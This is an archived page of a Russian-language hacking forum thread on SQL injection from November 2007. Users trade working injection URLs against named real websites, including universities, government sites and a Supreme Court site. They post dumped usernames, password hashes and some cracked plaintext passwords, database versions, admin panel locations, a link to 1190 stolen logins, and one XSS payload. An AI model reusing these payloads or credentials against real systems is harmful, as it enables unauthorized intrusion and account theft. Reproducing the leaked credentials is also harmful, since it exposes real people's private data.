SQL Инъекции [Архив] - Страница 15

delay(0)

01.11.2007, 23:41

http://www.aim.edu/

http://www.aim.edu/faculty/facultyresume.asp?id=-1+or+1=(select+top+1+cast(username+as+nvarchar)%2B %27%3A%27%2Bcast(password+as+nvarchar)+from+Extuse r+where+username+not+in+('gsbhatia','spprasu'))--

Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

Базы:
AIMADB
AIMBeta <- От сайта. Список таблиц:
'bboard_reply','a_yearexperience','a_country','a_e ducation','a_foundus','a_industry','a_jobfunction' ,'a_jobposition','a_orgtype','a_products','a_signu ptype','a_yearsworked','about_class','accesslist', 'advisorresults','Alumni_Picture','applicationform ','appRequirement','AppsLaunch','appslist','appsta tus','archiveapplicationform','archiveAppRequireme nt','archiveappstatus','archiveformassign','archiv eMEapplicants','bboard_subject','bboard_topic','Ca lendar','corners','cost_air','cost_dorm','cost_exe c','cost_food','cost_tuition','country','criteria' ,'D99_CMD','D99_Tmp','dbcourses','dbEventCategory' ,'dbevents','dbevents_new','dbflags','dbmodules',' dbobjectives','dbparts','dbprogqual','dbprograms', 'dbprograms2','dbprogrequirements','dbqualificatio ns','dbtrackcols','dbtrackrows','dean','department ','downloadhits','dtproperties','EmailBroadcast',' EmailBroadcastArchive','emailtemplate','ExtUser'(u sername,password),'ExtUserProfile','Faculty_Messag e','faculty_resume','faq','faq_escalation','faq_ke ywords','faq_type','formassign','funding','iExtUse rProfile','incappstatus','IntUser','IntUserProfile ','Jobs','lodging_types','logo','MEapplicants','me dia','memberaccesslist','membership('membershipID' ,'name','description')','news','period','Picture_G allery','Picture_Gallery2','prescorner','Prog2Scho ol','program_assign','publications','Reference','R efResultSet','relatednews','Rights','save_query_co st','save_query_funding','schools','statisticrepor ts','Statuslist','sysconstraints','syssegments','s ystables','t_jiaozhu','Video_Gallery','Video_Galle ry2','VIEW_STAT_SCH','VIEW1','vw_Jobs','vw_newsacc ess','vw_userapplist','vw_userapps','vwn_tblIncapp status_tblExtUser_tblExtUserProfile_tblCriteria',' webmessage','writereference'
AIMDB
AlumniPortal
master
Microfinance
model
msdb
Northwind
OSUSData
pubs
tempdb

1190 пользователей (логин:пасс)
http://www.rapidshare.com/files/66783989/lol.txt.html

-------------

Бесполезные скули :(

http://www.marshall.edu <- нет таблиц, не присутствуют пользователи
http://www.marshall.edu/www/announce.asp?ID=240+or+1=(select+top+1+table_name+ from+information_schema.tables)--

http://appserv02.uncw.edu <- нет доступа к интересным базам\таблицам
http://appserv02.uncw.edu/news/article.asp?ID=-1+or+1=(select+@@version)--

http://www.fisk.edu/ <- нет доступа к таблицам
http://www.fisk.edu/page.asp?id=72+or+1=(select+@@version)--

KEHT33

02.11.2007, 01:36

http://www.bananas-gym.de/docs/newscontent.php?id=36%20UNION%20SELECT%201,usernam e,3,user_password+FROM+phpbb_users/*

Есть ещё таблица sites

Так же есть поле user_icq но ничего не нашёл....короче только админить мона

ЛифчиС5СВ

02.11.2007, 02:32

http://www.gamerevolution.com/news/view.php?id=-3369+union+select+1,2,concat(user(),0x3a,version() ,0x3a,database()),4,5,6,7,8,9,10,11,12,13
User: gamerev@10.15.178.62
Version: 4.1.21-standard-log
Database: gamerev

Anna89

02.11.2007, 03:15

http://www.dukemednews.duke.edu/gallery/index.php?letter=C&isAdmin=399998+union+select+1,version(),3/*
Версия БД: 4.0.18
База: news
Юзер: web@vml-news.duhs.duke.edu

KEHT33

02.11.2007, 03:28

KEHT33

02.11.2007, 03:47

http://www.dukemednews.duke.edu/gallery/index.php?letter=C&isAdmin=399998+union+select+1,version(),3/*
Версия БД: 4.0.18
База: news
Юзер: web@vml-news.duhs.duke.edu

есть ещё база mysql.user
http://www.dukemednews.duke.edu/gallery/index.php?letter=C&isAdmin=399998+union+select+1,concat(user,0x3a,pas sword),3+FROM+mysql.user/*

KEHT33

02.11.2007, 04:27

http://www.ycegmbh.com/newscontent.php?id=-27%20UNION%20SELECT%201,name,pwd,4,5,6,7,8,9+FROM+ admin

adminка

http://www.ycegmbh.com/admin/login.php?

0nep@t0p

02.11.2007, 09:53

http://www.hawaii.gov
http://www.hawaii.gov/spo2/source/search_results.php?sourcemethodID=-2+union+select+aes_decrypt(aes_encrypt(concat(user name,0x3a,password,0x3a,email),0x71),0x71)+from+us ers+limit+1,99/*
Version: 4.1.12
User: webuser@ahi
1: administrator:5f4dcc3b5aa765d61d8327deb882cf99:pas sword
2: corinne:7c7727fdda7701ef4998d185b1357442:spoh

http://grande.nal.usda.gov
http://grande.nal.usda.gov/ibids/index.php?mode2=detail&origin=ibids_references&therow=-289466'+union+select+1,USER(),VERSION(),4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/*

Version: 4.0.14-log
User: gmoore@localhost

fobofob

02.11.2007, 11:56

Код:

http://www.soldatru.ru/subject_index/subject_show.php?id=-12+union+select+1,table_name,3,4,5,6,7,8,9,10+from +information_schema.tables/*
дальше не рыл-смеялся над ответом сервера

код:

http://eroshop.com.ua/?sec=forum&fit=-20768+union+select+1,2,3,4,5,cast(concat(login,0x3 a,password)+as+binary),7,8,9,10+from+users/*
заходим как админ...

fRg

02.11.2007, 15:07

pcper.com - PC Perspectivehttp://www.pcper.com/news.php?s=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,vers ion(),database(),user()),10,11,12,13,14,15/*5.0.22:PCPerspective:root@localhost
34 таблицы:http://www.pcper.com/news.php?s=-1+union+select+1,2,3,4,5,6,7,8,table_name,10,11,12 ,13,14,15+from+information_schema.tables+limit+33, 1/*Интересных таблиц не нашёл... :mad:

gibson

02.11.2007, 18:15

http://novochgrad.ru
db novochgr_novochgrad
user novochgr_novochg@localhost
ver 4.1.21-standard-log
http://novochgrad.ru/now.php?id=-1+union+select+null,version(),null/*
Больше ничего выдернуть не получается((

Nea7

02.11.2007, 20:42

http://www.afgrond.org/Forum/CommMain.php?O_ID=-1+union+select+concat(user(),0x3a,version(),0x3a,d atabase()),2,3/* roger@localhost:4.0.15:Afgrondhttp://www.109-7-109.ru/index.php?o_id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,vers ion(),0x3a,database()),8,9,10,11,12,13,14,15,16,17 ,18,19,20/* fmmarta@pm16.zenon.net:4.0.27-log:fmmartahttp://www.prezzibenzina.it/distributore.php?di_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52/*prezzibenzina@localhost:4.1.20-log:pb_main
http://www.prezzibenzina.it/distributore.php?di_id=-1+union+select+1,2,concat(us_id,0x3a,us_password,0 x3a,us_email),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52+from+users+limit+5500,1/* paty:06d2625cbe132813d18f9e13245d1d43:d.pedulla@ti n.ithttp://www.glidecam.com/operator_gallery.php?o_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5,6,7/* gcdbuser@localhost:4.1.20:glidecamcomhttp://www.consumercandy.com/goto.php?o_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(u ser(),0x3a,version(),0x3a,database()),14,15,16,17, 18,19,20,21,22,23,24,25/*candy_ccandy@localhost:4.1.22-standard:candy_consumercandyhttp://www.consumercandy.com/goto.php?o_id=-1+union+select+1,2,3,concat(email,0x3a,password),5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25+from+users+limit+1902,1/* notiee@hotmail.com:ªOÔÌy^Khttp://www.consumercandy.com/goto.php?o_id=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25+from+admin/*Noy:0364d49f7ea43aaaed7564795de9c56c7ef3ea8e
dan:59da512108d33d1266ab3a0b9a13b077bbd8c274
test:a94a8fe5ccb19ba61c4c0873d391e987982fbbd3
Rebecca:f8256df07b6c299348bf7ad3cd014949a5caef38
manager:7b21848ac9af35be0ddb2d6b9fc3851934db8420
партнерка =) Total Cash paid out to our members $5,645,851.39

Nea7

02.11.2007, 20:54

http://www.charitygreetings.com/newsend_1.php?o_id=-1+union+select+concat(user(),0x3a,version(),0x3a,d atabase()),2/*charitygreetings@localhost:4.1.20:charitygreeting s
http://www.wexmedia.at/details.php?o_id=99999+union+select+1,2,3,4,5,6,7, 8,9,10,aes_decrypt(aes_encrypt(version(),0x71),0x7 1),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45/*'4.1.18-standard-log
http://www.pysanka.ua/index.php?navl=otkrutki&o_id=-1+union+select+1,version(),user()/* pisanka@localhost 5.0.27
http://www.pysanka.ua/index.php?navl=otkrutki&o_id=-1+union+select+1,2,concat(user,char(64),password)+ from+mysql.user+limit+0,1/* root@22b60809101adcf3
olusm@707b5362398716cc
chipua_user@74e54a4f70159a50
kazanova_user@3b251a676d8ee804
kviten@400dd0984950a0f5
obolon@6259a20519584237
pisanka@5376110c3fa1e846
scandic@0a40aadb79278a38
tenders@6872dce4027e979b
ukrbizner@084aff4320ccc88d
vgorah_user@7d21440837c74ae7
weather@5539e1093c971082
razvlekalov@0e42b63135601dbc
solodko@2ac85b22774a0f53
http://www.pysanka.ua/index.php?navl=otkrutki&o_id=-1+union+select+1,2,concat(table_schema,char(64))+f rom+information_schema.tables+where+table_name=cha r(117,115,101,114,115)+limit+2,1/* интересные таблицы:
forumobolon.users
kazanova.users
olus.users
pisanka.users
razvlekalov.users
ukrbiznes_expo.users
kviten.clients
ukrbiznes_catalog.clients
kviten.gamers
news2.subscribe
razvlekalov.subscribe
ukrbiznes_catalog.subscribe
ukrbiznes_news.subscribe
...домейнсдб =)
http://www.cultspace.org/viewHolyTextComments.php?text_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database())/* cultspac_root@localhost:4.1.22-standard-log:cultspac_production
http://www.filmaffinity.com/es/listtopmovies.php?list_id=-1/**/union/**/select/**/concat(user(),0x3a,version(),0x3a,database())/* filmaf2_webuser@localhost:5.0.27:filmaf2_data
http://www.filmaffinity.com/es/listtopmovies.php?list_id=-1/**/union/**/select/**/concat(char(64,64),NOMBRE,0x3a,USUARIO,0x3a,PASSWO RD,0x3a,E_MAIL,0x3a,V_E_MAIL,char(64,64))+from+fa_ usuarios+limit+5768,1/*
http://www.timothysyndrome.org/index.php?p=list_links&l_id=-1+union+select+1,2,3,4,5,concat(user(),0x3a,versio n(),0x3a,database())/*timmi@localhost:4.1.20:timothysyndromeorg
http://ru.ecomstation.ru/ecsfaq/faq.php?idc=99999/**/union/**/select/**/1,2,3,concat(user(),0x3a,version(),0x3a,database() ),5,6,7,8,9/*eco@localhost:4.1.22:ecohttp://www.igrandiviaggi.it/scheda.php?id=-1'+union+select+1,2,3,4,5,6,concat(user(),0x3a,ver sion(),0x3a,database()),8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 ,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,6 7,68,69,70,71,72,73,74,75,76,77,78,79,80/*igrandiviaggi@piaccapi:5.0.45-community-nt:igrandiviaggi

fobofob

02.11.2007, 23:29

Код:

http://russianwomenabroad.com/links/report.php?id=-329+union+select+1,concat_ws(0x3a,username,user_em ail,user_icq,user_password),3,4,5,6,7,8,9,10,11,12 ,13,14,15+from+phpbb_users+limit+0,1/*

админ на русскоязычном форуме: admin/mamalena

код:

http://russianwomenabroad.com/links/report.php?id=-329+union+select+1,concat_ws(0x3a,username,user_em ail,user_icq,user_password),3,4,5,6,7,8,9,10,11,12 ,13,14,15+from+phpbbe_users+limit+0,1/*

ElteRUS

02.11.2007, 23:38

http://www.gavgav.info/index.php?tree=4&mode=view&id=-1+union+select+concat_ws(0x2F,version(),database() ,user()),2,3,4,5,6/*

4.1.22-lk-log/ikarhomcen_gav/ikarhomcen_gav@localhost

-------------------------------------------------------------------

http://www.zyll.net/news.php?id=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6,7/*

4.1.22-log/freemp3_slovo/freemp3_slovo@goliaph

------------------------------------------------------------------

http://wow.crpg.ru/article.php?sid=-1+union+select+1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(v ersion(),0x71),0x71),AES_DECRYPT(AES_ENCRYPT(user( ),0x71),0x71),8,9,10,AES_DECRYPT(AES_ENCRYPT(datab ase(),0x71),0x71),12/*

4.1.7/WOW/wow@localhost

------------------------------------------------------------------

http://www.crpg.ru/sections.php?op=viewarticle&artid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version (),0x71),0x71),AES_DECRYPT(AES_ENCRYPT(database(), 0x71),0x71),5,6,AES_DECRYPT(AES_ENCRYPT(user(),0x7 1),0x71),8,9,10,11,12,13,14,15,16,17,18,19,20,21/*

4.1.7/ crpg/ crpg@localhost

min7

02.11.2007, 23:49

Так сказать мои первые шаги в освоении SQL инъекций)
http://www.phpbuddy.com/article.php?id=-4+union+select+concat_ws(0x3a,user(),version(),dat abase()),2,3,4,5,6/*
phpbud22_phpbudd@localhost/4.1.21-standard-log/phpbud22_phpbuddy

V.I.P

03.11.2007, 10:30

http://www.toulouseweb-aero.com/news_affic.php?id=8711+order+by+37/*

http://www.aerokubinka.ru/index.php3?id=199+union+select+1,2,3,4,5,concat(ni ck,char(58),email,char(58),passwd,char(58),icq),7, 8,9+from+_user/*

Версия: 5

http://www.ff-aero.fr/affichage_textes.php?id=-61+union+select+1,2,3,4,version(),6,7,8,9,10,login ,password,13,14,15,16+from+user/*

Версия: 4.1.20-max-log

http://matkarajad.maaturism.ee/index.php?id=85+union+select+1,version(),3,4,5,6--&pg=object

Виерсия: 4.1.22-log (внизу)

http://www.capsi.ca/council.php?mem_id=3+union+select+1,2,3,4,5,6,conc at_ws(char(58),name,email,password),8,9,10,11,12,1 3+from+members/*

KEHT33

03.11.2007, 11:27

Демократия

http://www.democracy.ru/article.php?id=1837+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16/*

3 таблицы
news
phpb_users
clients

KEHT33

03.11.2007, 16:16

Клуб Бухгалтеров

http://www.provodka.ru/publication.php?id=1096&part=-17%20UNION%20SELECT%201/*

версия БД >5 таблиц 147

офигеть нашёл нормальную таблицу phpbb_users, если кто сможет её залить скиньте в личку плиз

V.I.P

03.11.2007, 17:38

http://www.ramzesexpo.com/ru/news/index.php?id=-24+union+select+1,2,3,4,5,6,7,8,name,10,11,12,13,1 4,15,16,17,18,19,20+from+ramzesexpo/*

http://www.merrimack.tv/news/index.php?id=-1+union+select+1,table_name,3,4,5,6,7,8+from+infor mation_schema.tables/*

min7

03.11.2007, 18:16

http://www.ecodefense.ru/view.php?id=-483+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a, user(),database(),version()),11/*
ecodefensedb@localhost/ecodefense/4.1.22-log

KEHT33

03.11.2007, 20:51

http://www.vaal.ru/show.php?id=-170+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11/*
4.0.27-max-log

Баз нарыть не смог

Dimi4

03.11.2007, 21:00

http://www.vaal.ru/show.php?id=-170+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11/*
4.0.27-max-log

Баз нарыть не смог
Сорри за офф, там ищо хсс в поиске

"><script>alert()</script>

KEHT33

03.11.2007, 21:42

http://www.korova.ru/humor/viewer.php?id=4434+UNION+SELECT+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18+LIMIT+1,1/*
БД 4.0.27-max-log
таблиза sites

KEHT33

04.11.2007, 02:03

http://fromatoz.com.ua/book.php?sprav=santeh2006&rubr=4+UNION+SELECT+1,concat(user,0x3a,pass),3+Fro m+users/*

http://fromatoz.com.ua/book.php?sprav=santeh2006&rubr=4+UNION+SELECT+1,concat(user,0x3a,password),3 +From+mysql.user/

Админка
http://fromatoz.com.ua/admin/login.php

KEHT33

04.11.2007, 02:37

http://www.ftrain.h1.ru/article.php?sid=-24+UNION+SELECT+1,2,3,4,5,6,7/*
таблицу не нашёл
БД 4.0.18

fobofob

04.11.2007, 06:35

Мобильные блоги

Код:

http://moblog.co.uk/view.php?id=-77571+union+select+1,2,3,4,5,6,7,8,9,10,11,12,conc at_ws(0x3a,userid,username,displayname,email,realm ail,password),14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49+from+mob_users+limit+15741,1/*

первый юзер в списке-админ на форуме ;)
________________________________________

Магазин рефератов,курсовых...

код:

http://www.sessia.ru/index.php?mode=links_catalog&cid=-24+union+select+1,2,3,4,5,6,concat(email,0x3a,name ,0x3a,password),8,9,10,11,12,13,14,15,16,17+from+u ser/*

K1nD[e]R

04.11.2007, 09:10

Типа Хостинга Украинского

http://www.ukrnic.com/hosting_info.php?id=2+union+select+1,version(),use r()/*

данные ukrnic_dima@localhost

K1nD[e]R

04.11.2007, 09:13

http://www.4oem.ru/stat/index.php?id=-10+union+select+1,2,3,4,5,6,concat(version(),0x3e, user(),0x3e),8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22/*

5.0.27-log|| oem@app-serv.global.by

K1nD[e]R

04.11.2007, 09:29

http://www.mediumsearch.com/catalog/category.php?id=-27+union+select+1,concat(user(),0x3a,version()),3/*

a270_1@localhost 4.1.20-log

kair

04.11.2007, 12:18

emagiC CMS.Net 4.0
http://www.ecare.be/emc.asp?pageId=1'%20union+select+top+1+convert(int ,password)+FROM+EMAGIC_LOGINS%20%20where%20usernam e='sa'--
http://www.ecare.be/emc.asp?pageId=1'%20union+select+top+1+convert(int ,password)+FROM+EMAGIC_LOGINS--

http://www.ecare.be/emc.asp?pageId=1'%20union+select+top+1+convert(int ,username)+FROM+EMAGIC_LOGINS--

Nea7

04.11.2007, 13:52

http://www.lovestory.name/?porno_video=-1+union+select+1,2,version(),user()/*u55067@10.10.223.233 5.0.45-log Mbhttp://www.gaylovespirit.org/workshops_es.php?cat=1&wid=-1'+union+select+1,2,concat(user(),0x3a,version(),0 x3a,database()),4,5,6,7/*U200335@uncivil.stor:4.0.27:DB200335http://www.loveandrespect.com/content/article.php?aid=1+or+1=@@version--'Microsoft SQL Server 2000http://masterboat.ru/index.php?D=3&id=-1+union+select+1,version(),3,4,5,user(),7,8,9,10,1 1,12,13,14/*&file=catalog&content=short_info4.0.27 sistema@cheetah.NODEX.ruhttp://www.idmaster.co.uk/idm_order.php?card_id=-1+union+select+1,version(),3,4,5,6,7,8/*4.1.22-standardhttp://www.gifts.master-board.ru/mes.php?id=-1+union+select+1,2,3,database(),5,version(),7,user (),9,10/*5.0.45-Max-log mboardb7_user@c11-w.ht-systems.ru mboardb7_mbhttp://blog.pmaster.net/post.php?id=-1+union+select+1,version(),3,4,5,user(),7,8,9,data base(),11/*4.1.22-log pmaste_blog@localhost pmaste_pmbloghttp://www.immaster.net/news_page.php?pag=&id=-1+union+select+1,2,version(),user(),5,6,database() ,8,9/*5.0.45-Dotdeb_0.dotdeb.1-log webulesti@localhost immhttp://www.immaster.net/news_page.php?pag=&id=-1+union+select+1,2,user,password,5,6,7,8,9+from+my sql.user+limit+0,1/*stud:52099bc10ef4f64c
root:0889eae004418834
omegas:75da24625a4cfb48

_GaLs_

04.11.2007, 14:17

http://www.infoelekt.com/public/product_detail.php?id=-1262+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36/*

http://www.medsys.ru/index.phtml?mm=quest&sm=faq&ctype=15&cdir=-1+union+select+1,version(),user(),database(),5/*

min7

04.11.2007, 18:41

Никак не могу найти пассы...
http://www.allianceforbiz.com/events/specific_event.php?id=-89+union+select+concat_ws(0x3a,user(),database(),v ersion()),2,3,4,5,6,7,8,9/*
alliance_shows@localhost/alliance_Show2005be/4.1.22-standard

kair

04.11.2007, 19:31

emagiC CMS.Net 4.0
http://www.econocom.com/emc.asp?pageId=2378'%20UNION%20SELECT%20TOP%201%20 convert(int,%20password%2b'%20kair')%20FROM%20EMAG IC_LOGINS%20where%20username='sa'--
http://www.econocom.com/emc.asp?pageId=2378'%20UNION%20SELECT%20TOP%201%20 convert(int,%20username%2b'%20kair')%20FROM%20EMAG IC_LOGINS--

min7

04.11.2007, 20:41

http://www.gesmer.com/publications/article.php?ID=-172+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4,5,6,7,8/*
oslegal@localhost/GU2/4.0.20
http://www.gesmer.com/publications/article.php?ID=-172+union+select+1,password,3,4,5,user,7,8+from+my sql.user+limit+0,1/*
root:032c41e8435273a7:letmein
http://www.gesmer.com/publications/article.php?ID=-172+union+select+1,password,3,4,5,user,7,8+from+my sql.user+limit+1,5/*
oslegal:7c9fbfb223888670:

JIyka

04.11.2007, 21:21

http://www.honoluluweekly.com/cover/detail.php?id=-1+union+select+1,-1+union+select+1,column_name,3,4,5,6+from+informat ion_schema.columns+where+table_name=CHAR(0x72,0x77 ,0x64,0x5F,0x75,0x73,0x65,0x72,0x73)/*

hweight@lira.dreamhost.com

l-l00K

04.11.2007, 22:16

aifrostov.ru
http://www.aifrostov.ru/index.php?sec=rubr&id_st=-1227'+union+select+1,2,3,4,concat_ws(char(58),vers ion(),user(),database()),6,7,8,9,10,11,12,13,14,15 ,16+from+news+--+
4.1.22:AIFROSTOV@LOCALHOST:AIFROSTOV

interstar.ua
http://www.interstar.ua/internet/index.php?id=-684+union+select+concat_ws(char(58),cast(table_nam e+as+binary))+from+information_schema.tables+limit +274,1+--+&main_menu=3
5.0.18-Max:webadmin@localhost:IStarmobile

seo-maker.ru
http://seo-maker.ru/news_out3.php?id=38392+union+select+1,concat_ws(ch ar(58),version(),user(),database()),3,4,5,6,7+--+
4.1.20-log:a1777_3@localhost:a1777_3

baltportal.ru
http://baltportal.ru/index.php?type=500&idNews=-9490+union+select+1,2,concat_ws(char(58),version() ,user(),database()),4,table_name,6,7,8,9,10,11,12, 13,14,15,16+from+information_schema.tables+--+
5.0.45-community-log:nwlove_baltru@localhost:nwlove_baltru

big_BRAT

04.11.2007, 23:22

http://support.kharkiv.ukrtelecom.ua/
http://support.kharkiv.ukrtelecom.ua/news/?id=1+unIon+SelEcT+null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,curren t_database()||chr(58)||version()||chr(58)||current _user,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null--
Общая информация:
support:PostgreSQL 7.3.18 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.2.2 20030222 (Red Hat Linux 3.2.2-5):reader
==========================================
http://support.kharkiv.ukrtelecom.ua/news/?id=1+unIon+SelEcT+null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,usenam e||chr(58)||passwd,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null+from+pg_user--
Выбераем пользователей с "паролями":
pgsql:********
postgres:********
reader:********
writer:********
===========================================
http://support.kharkiv.ukrtelecom.ua/news/?id=1+unIon+SelEcT+null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,usenam e,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null+from+pg_ user+where+usesuper=true--
Выбераем привилегированных пользователей:
postgres

к сожелению вытащить пароль из pg_shadow не получится, мы работаем от пользователя ридер(
==========================================
http://support.kharkiv.ukrtelecom.ua/news/?id=1+unIon+SelEcT+null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,datnam e,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null+from+pg_ database--
выбираем существующии базы:
balakleya
bogoduhiv
callcenter
chuguyiv
cit
dergachi
forum
Gallery
games
izum
kalendar
krasnograd
kupyansk
lozova
mtz
news
opros
orderdsl
Phone
pool
postgres
radio
rayon
sc
support
template0
template1
vodolaga
vovchansk

min7

04.11.2007, 23:53

http://surcon.ru/pages.php?id=-18+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5/*
vodos68_admin@web2.100mb.net/vodos68_surcon/
4.0.25-standard
http://surcon.ru/pages.php?id=-18+union+select+1,concat_ws(0x3a,login,mail,passwo rd),3,4,5+from+users+limit+0,15/*
admin:123456

cardons

05.11.2007, 02:01

Народ к сожалению я нечего непонимаю в SQL Inj, но что мне делать вот такой ссылкой
http://192.168.99.8/modules.php?name=News&topic_id=3&pagenum='

KEHT33

05.11.2007, 03:10

http://metalistfans.net/news.php?id=-939UNION%20SELECT%201,2,3,4,5,6,7,8,9/*

таблиц не нашёл ( КТо найдёт отпишитесь плз

http://www.golodomor.org.ua/speech.php?id=-1562+UNION+SELECT+1,concat(user,0x3a,pass),3+From+ users/*

Scipio

05.11.2007, 04:11

2KEHT33
http://metalistfans.net/news.php?id=-939UNION%20SELECT%201,2,3,name,5,6,7,8,9%20from%20 forum/*

а таблицы с админами там может и не быть вобще...
ЗЫ как видно имена таблиц идут без префикса, хотя не факт

еще там есть табличка teams

KEHT33

05.11.2007, 04:41

2KEHT33

а таблицы с админами там может и не быть вобще...
ЗЫ как видно имена таблиц идут без префикса, хотя не факт

еще там есть табличка teams

ну вот тут с префиксом и тоже не нашёл )
http://soft.tomck.com/reiting.php?link=47+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19/*

fobofob

05.11.2007, 15:13

Код:

http://skr.su/?div=zakony&id=-111+union+select+1,2,3,4,5,6,7,8,9,10,concat(login ,0x3a,pass),12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45+from+users+limit+0,1/*

не понял что за пароли такие :(

min7

05.11.2007, 16:18

http://ivanpro.org/top_menu.php?id=-4+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user() ,database(),version()),9,10,11,12,13,14,15,16,17,1 8/*
ivanproorg@localhost/ivanproorg/5.0.22-Debian_2-log
http://ivanpro.org/top_menu.php?id=-4+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,admin_ login,admin_pass,admin_mail),9,10,11,12,13,14,15,1 6,17,18+from+auto_ws_admin_option+limit+0,1/*
admin:pass:www.websmith.ru
Админку не нашёл...

05.11.2007, 16:51

_http://partytown.ru/people.php?id=-3+union+select+1,2,concat_ws(0x3a,username,icq,pas sword),4+from+chatusers+limit+1,1
Tonikk:120853239:2e4b6dc525afb5cb
_http://www.iwf.ru/main/top.php?id=7+union+select+1,2,concat_ws(0x3a,login ,passw),4+from+main
Alla2:asdf
Rahashan:poiu:1
Lavel:asdf:0
Vesta:aszx:0
users>username>password>accesslevel
test:test:0

Scipio

05.11.2007, 22:15

Верховный суд РФ

http://www.supcourt.ru/courts_m.php?b=-2005)+union+select+aes_decrypt(aes_encrypt(concat( user,0x3a,password),0x71),0x71)+from+mysql.user/*

работает на винде
мускул 5-ветки
пароли и логины пользователей БД по линку на странице
(их 3)

вот вывод всех таблиц и колонок:
http://www.supcourt.ru/courts_m.php?b=-2005)+union+select+aes_decrypt(aes_encrypt(concat( table_name,0x3a,column_name),0x71),0x71)+from+info rmation_schema.columns/*

(сначала линки неправильные дал, из браузера скопировал неправильно, сейчас исправил, линки рабочие)

ЛифчиС5СВ

06.11.2007, 01:21

http://www.rotary.or.id/v20/news/detail.php?all=1&id=-1+union+select+1,2,version(),user(),5,database(),7 ,8,9

Округ 3400 Индонезии

Version: 4.1.20-log
User: tsantoso_3@209.68.1.63
Database: tsantoso_project

Бла, как ни старался подобрать таблицы - никак...

l-l00K

06.11.2007, 01:23

tomsknews.com
http://tomsknews.com/news/?id=-4128)+union+select+concat_ws(char(58),version(),us er(),database())+--+
4.1.22-log:wttomsknews@localhost:wttomsknews

foodmedia.ru
http://www.foodmedia.ru/?space=5&article=-3912+union+select+concat_ws(char(58),version(),use r(),database())+--+
4.1.22:food3@localhost:food-media

http://www.foodmedia.ru/?space=5&article=-3912+union+select+concat_ws(char(58),username,user _password,user_icq)+from+phpbb_users+limit+1,1+--+
admin:f6fdffe48c908deb0f4c3bd36c032e72:adminadmin

ElteRUS

06.11.2007, 01:53

http://cinema.variety.ru/actors.php?cid=1&aid=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6,7,8,9,10,11,12,13/*

4.0.27-standard-log/variety_dvd/variety_dvd@localhost

-------------------------------------------------------------------

http://www.semenovsky.ru/?pageId=124&newsId=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1, 1/*

5.0.44-log/semenovskiy/semenovskiy@localhost

http://www.semenovsky.ru/?pageId=124&newsId=-1+union+select+1,2,concat_ws(0x2F,table_name,colum n_name),4,5,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1,1+fro m+information_schema.columns/*

